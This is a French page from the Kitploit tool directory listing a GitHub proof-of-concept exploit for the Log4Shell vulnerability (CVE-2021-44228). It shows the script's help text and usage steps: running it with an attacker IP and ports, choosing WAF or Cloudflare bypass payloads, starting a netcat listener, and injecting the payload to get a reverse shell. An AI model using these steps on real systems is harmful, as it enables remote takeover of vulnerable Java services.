Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j-shell-csw — Un exploit de preuve de concept pour la vulnérabilité CVE-2021-44228. | Kitploit
Outils/GitHubGitHub/cybersecurityworks553/log4j-shell-csw
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFCommandement et Contrôle
GitHubcybersecurityworks553/log4j-shell-csw

log4j-shell-csw

Un exploit de preuve de concept pour la vulnérabilité CVE-2021-44228.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
82il y a 4 ansPas encore vérifié

Exploit simple Log4j

Un exploit de preuve de concept pour la vulnérabilité CVE-2021-44228.

Log4j, utilisé pour journaliser les informations de sécurité et de performance, impacte plus de 3 milliards d'appareils utilisant Java à travers divers services grand public et d'entreprise, sites web et applications, ainsi que des dispositifs médicaux et des systèmes associés.
Remarque : Ce n'est pas un exploit « point and click ». Le payload de déclenchement initial sera généré, mais son injection à l'endroit approprié (c.-à-d. en-tête HTTP/chat/etc.) sera à la charge de l'utilisateur.

Prérequis

  • python3
  • pip install -r requirements.txt
  • Installez jdk1.8.0_20 et ajoutez le dossier bin à la variable d'environnement
root@kitploit:~
usage: python CVE-2021-44228-exploit.py --help 
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html

usage: CVE-2021-44228-exploit.py [-h] [--userip userip] [--webport webport] [--lport lport] [-b bypass]

log4shell Reverse shell exploit

optional arguments:
  -h, --help            show this help message and exit
  --userip userip       Enter IP for LDAPRefServer & Shell
  --webport webport     listener port for HTTP port
  --lport lport         Netcat Port
  -b bypass, --bypass bypass
                        Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the
                        ${lower:x} method restriction bypass
Exemple :
  1. Exécutez le script pour Linux OS avec le payload de contournement de méthode
root@kitploit:~
python poc-csw.py --userip private-ip --webport 8888 --lport 9001 -b methods

2) Exécutez netcat sur le port 9001 sur votre machine locale

root@kitploit:~
nc -lvnp 9001
  1. Copiez le payload « Try me » pour contourner la restriction de méthodes et utilisez-le comme variable d'entrée pour obtenir un shell dans netcat
    Remarque : Si aucun bypass n'est choisi, utilisez le payload « Send me »

Référence

  • https://akashpatil.me/log4j-guide-book.html
  • https://github.com/kozmer/log4j-shell-poc
Télécharger l’outil